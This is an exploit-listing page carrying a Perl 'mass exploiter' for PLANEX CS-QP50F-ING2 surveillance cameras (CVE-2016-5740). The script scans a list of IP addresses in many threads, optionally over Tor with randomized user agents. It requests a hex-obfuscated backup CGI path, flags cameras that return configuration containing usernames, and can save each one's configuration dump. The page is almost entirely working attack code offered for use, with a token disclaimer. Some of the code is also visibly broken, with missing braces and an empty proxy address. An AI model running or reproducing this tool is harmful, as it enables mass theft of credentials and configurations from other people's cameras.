
PLANEX CS-QP50F-ING2 Remote Configuration Disclosure

CVE Category Price Severity
CVE-2016-5740 CWE-200 $1,000 High
Author Risk Exploitation Type Date
Hemant Patil High Remote 2021-01-06
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

PLANEX CS-QP50F-ING2 Remote Configuration Disclosure
#  PLANEX CS-QP50F-ING2 Security Surveillance Smart Camera Remote Configuration Disclosure - Mass Exploiter
#  Copyright 2021 (c) Todor Donev <todor.donev at>
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#  Use them at your own risk! 

use strict;
use warnings;

use Getopt::Long; 
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random; 
use Data::Validate::IP;
use MCE::Hobo 1.817;
use MCE::Shared;
use Gzip::Faster 'gunzip';

my $queue1 = MCE::Shared->queue(fast => 1);
my $queue2 = MCE::Shared->queue(fast => 1);

my $redirects       = 3;
my $timeout         = 60;
my $targets         = undef;
my $threads         = 10;
my $tor             = undef;
my $dump            = undef;
my $gzip_magic      = "\x1F\x8B\x08";

printf("\n PLANEX CS-QP50F-ING2 Security Surveillance Smart Camera Remote Configuration Disclosure - Mass Exploiter\n");

sub help() {
    printf("\n $0 --targets=<FILENAME> [ --threads=10 --redirects=7 ] --help\n\n");
    printf("   Required args:\n\n");
    printf("   %-12s |  %s\n\n", "--targets", "Specify the list with addresses that you want to scan.");
    printf("   Not required args:\n\n");
    printf("   %-12s |  %s\n", "--dump", "Dump backup configuration file for each target");
    printf("   %-12s |  %s\n", "--tor", "Use Tor anonymity network");
    printf("   %-12s |  %s\n", "--timeout", "Specify HTTP request timeout. Default: 60");
    printf("   %-12s |  %s\n", "--threads", "Specify threads. Default: 10 / Maximum threads: 200");
    printf("   %-12s |  %s\n\n", "--redirects", "Specify HTTP response redirects. Default: 3");
    printf("   e.g. perl $0 --targets=portscan.log --threads=25\n");
    printf("   e.g. perl $0 --targets=portscan.log --threads=25 --tor\n");
    printf("   e.g. perl $0 --targets=portscan.log --threads=25 --tor --dump\n\n\n");
    printf(" Author: Todor Donev <todor.donev\>\n\n\n");
    "targets=s"     => \$targets,
    "timeout=i"     => \$timeout,
    "redirects=i"   => \$redirects,
    "threads=i"     => \$threads,
    "tor"           => \$tor,
    "dump"          => \$dump,
    "help|h!"       => \&help
help() if (!$targets);
printf(" Error: TARGETLIST not exist, not readable, not plain or is empty!\n") and exit if (! -e $targets || -z $targets || ! -r $targets || ! -f $targets);
printf(" Error: Timeout is too short. Minimum timeout: 10\n") and exit if ($timeout < 10);
printf(" Error: Threads are too many. Maximum threads: 200\n") and exit if ($threads > 200);

my @tmp_targets = ();
my @targets = `cat $targets | grep -v '^[[:space:]]*[#;]' | uniq`;

for my $line (@targets) {
    next if ($line =~ /^(\s*(#.*)?)?$/);
    next if (not is_ipv4($line));
    push @tmp_targets, $line;

@tmp_targets = sort { $a cmp $b } @tmp_targets;
@targets = ();
@targets = @tmp_targets;
@tmp_targets = ();
printf(" Error: There are not valid targets specified for scanning.\n") and exit if (scalar @targets == 0);

printf(" Target                         Code                                     Status                              \n");

MCE::Hobo->create("work") for 1..$threads;


while (my $result = $queue2->dequeue) {
    if (exists $result->{finished}) {
        $queue2->end unless MCE::Hobo->pending;
    my ($target, $code, $status) = ($result->{target}, $result->{code}, $result->{status});
    printf(" %-30.30s %-40.40s %-50.50s\n", $target, $code, $status);


sub work {
    while (my $addr = $queue1->dequeue()) {
        my ($target, $code, $status) = scan($addr, $redirects, $timeout);
        $queue2->enqueue({ target => $target, code => $code, status => $status});
    $queue2->enqueue({ finished => $$ });

    sub scan {
        my ($addr, $redirects, $timeout) = @_;
        my $user_agent = rand_ua("browsers");
        my $browser  = LWP::UserAgent->new( protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
        if (defined($tor)) {
            $browser->proxy([qw(http https)] => 'socks://');
        my $target = "http://".$addr."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
        my $header = ["Content-Type" => "application/x-www-form-urlencoded; charset=UTF-8"];
        my $request = HTTP::Request->new (GET => $target, $header, "");        
        my $response = eval{ $browser->request($request) };
        my $status = ($response->content =~ m/($gzip_magic)/ && gunzip($response->content) =~ m/username/) ? "VULNERABLE" : "NOT VULNERABLE";
        if (defined($dump)) {
            if ($response->is_success && $status eq "VULNERABLE") {
                my @config = $response->content;
                my $config_file = $addr."_config_backup.bin";
                open (FH, "> $config_file") or die " Error: $config_file $!";
                flock (FH, 2);
                truncate (FH, 0);
                seek (FH, 0, 0);
                print (FH $_) foreach (@config);
                close (FH);
                @config = ();
        my $code = $response->status_line() ? $response->status_line() : "ERROR";
        return ($addr, $code, $status);

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